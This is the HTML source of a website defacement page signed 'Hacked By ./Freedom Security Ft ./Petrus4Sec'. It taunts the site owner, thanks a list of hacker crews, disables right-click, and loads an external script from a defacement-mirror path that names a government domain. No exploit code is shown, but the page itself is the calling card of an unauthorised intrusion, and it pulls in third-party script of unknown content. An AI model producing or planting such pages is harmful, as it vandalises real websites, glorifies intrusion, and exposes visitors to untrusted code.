<html>

<head>
	<title>Hacked By ./Freedom Security Ft ./Petrus4Sec</title>
	<link rel="icon" type="image/png" href="https://c.top4top.io/p_20661mc0d0.png">
	<meta property="og:image" content="https://c.top4top.io/p_20661mc0d0.png" />
	<meta name="description" content="Hello">
	<meta charset="utf-8">
	<style>
		html,
		body {
			color: #fff;
			font-family: 'Fredericka the Great', sans-serif;
			font-weight: 100;
			height: 100vh;
			margin: 0
		}

		.full-height {
			height: 100vh
		}

		.flex-center {
			align-items: center;
			display: flex;
			justify-content: center
		}

		.position-ref {
			position: relative
		}

		.content {
			text-align: center
		}

		.title {
			font-size: 36px;
			padding: 20px
		}
	</style>
</head>
<style type='text/css'>
	body,
	a:hover {
		cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important;
	}
</style>

<body align="center" oncontextmenu="return false" bgcolor="ffffff">
	<div class="stars">
		<div class="twinkling">
			<div class="flex-center position-ref full-height">
				<div class="content">
					<div class="text">
						<font color="#00000">
							<img src="https://c.top4top.io/p_20661mc0d0.png" width="450px" heigt="450px">
							<br> <br>
							<font size="5">
								<b><i><code> Hacked By ./Freedom Security Ft ./Petrus4Sec</font>
		 	 				 <br><br><h2>~ Your Security Site Is Good , But Not Enough To Stop Me ~<h2><h2>--- 𝑵𝑬𝑼𝑻𝑹𝑨𝑳 𝑰𝑵𝑫𝑬𝑿 𝑻𝑬𝑨𝑴 ---</h2><h2>Thanks To : </h2><h2>WitchWasHere  - Has -wenos -r -  </4rilxz> - nNn404 - dapzxploit - Yoshik4wa -mrkzX -G4rzzXPloit - ./AnonHax7 - Geneva Cyber Team - XERO ANON TEAM - ./Freedom Security - Petrus4Sec - ./AnonHax7 - H4XOR GBP - ./Fan Hornet - Mr Ngesmoke 
			<script type="text/javascript" src="http://zonehmirrors.org/defaced/2020/06/23/ardma.midanuttalim.com/suhunan.sukabumikab.go.id/sakura.js"></script>
		 	 				</body>
		 	 				 </html>
